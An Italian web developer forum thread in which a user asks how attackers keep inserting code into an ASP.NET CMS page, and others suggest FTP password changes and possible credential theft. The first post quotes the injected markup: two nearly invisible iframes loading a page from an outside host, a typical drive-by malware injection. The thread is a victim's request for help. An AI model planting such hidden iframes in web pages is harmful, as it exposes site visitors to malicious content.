843 messaggi dal 08 aprile 2009
Ho un sito web fatto un cms in casa che mi viene hackerato ma non riesco a capire in che modo.
Non è un problema di sql injection. Ho preso tutte le precauzioni del caso.
Mi ritrovo nella mia pagina index.aspx del codice aggiunto:
<iframe src="http://firmamag.com/wp-content/plugins/zeatchyaova/hellpp.html" frameborder="0" width="2" height="3"></iframe><iframe src="http://firmamag.com/wp-content/plugins/zeatchyaova/hellpp.html" width="2" height="3"></iframe></div>

Come fanno?
Fisicamente dovrebbero aprire la pagina e aggiungere manualmente il codice.
14 messaggi dal 23 aprile 2012
Cerca di aggiungere più dettagli o qualche frammento di codice TUO, per capire se c'è una bug; io personalmente in questo modo non riesco ad esserti utile...
843 messaggi dal 08 aprile 2009
la parte cms lavora per querystring e secondo la voce del menù chiamata visualizza i contenuti collegati.
Dopo aver recuperato la stringa del querystring controllo se c'è codice sql injection e se c'è vado in eccezione.
Ripeto non è un problema di sql injection ma un problema che hanno aggiunto codice nel markup della pagina aspx.
Come fanno?
41 messaggi dal 26 novembre 2003
La prima cosa che farei è il cambio della password d'accesso all'FTP con una bella tosta ...

Se invece hai un bug nel codice, senza un'attenta analisi dello stesso, è quasi impossibile capire.

Ciao
103 messaggi dal 04 ottobre 2010
Se è possibile mettere tutto sotto certificazione, ovviamente si può avere una protezione ottimale, in caso contrario basta un man in the middle per poter sapere eventuali password, con tempi, mezzi e conoscenze dovute.
843 messaggi dal 08 aprile 2009
Password FTP ovviamente cambiata.
Infatti il dubbio è che il cliente abbia preso un virus nel suo PC e che tramite questo hanno preso i dati di accesso al sito.
Ho trovato anche un file htaccess...

Non ho capito bene cosa voglia dire questo:
" in caso contrario basta un man in the middle per poter sapere eventuali password, con tempi, mezzi e conoscenze "
41 messaggi dal 26 novembre 2003
laurar181 ha scritto:

Non ho capito bene cosa voglia dire questo:
" in caso contrario basta un man in the middle per poter sapere eventuali password, con tempi, mezzi e conoscenze "


Ciao leggi quest'articolo che ti spiega alcune cosucce sull'argomento: Uomo nel mezzo...

Torna al forum | Feed RSS

ASPItalia.com non è responsabile per il contenuto dei messaggi presenti su questo servizio, non avendo nessun controllo sui messaggi postati nei propri forum, che rappresentano l'espressione del pensiero degli autori.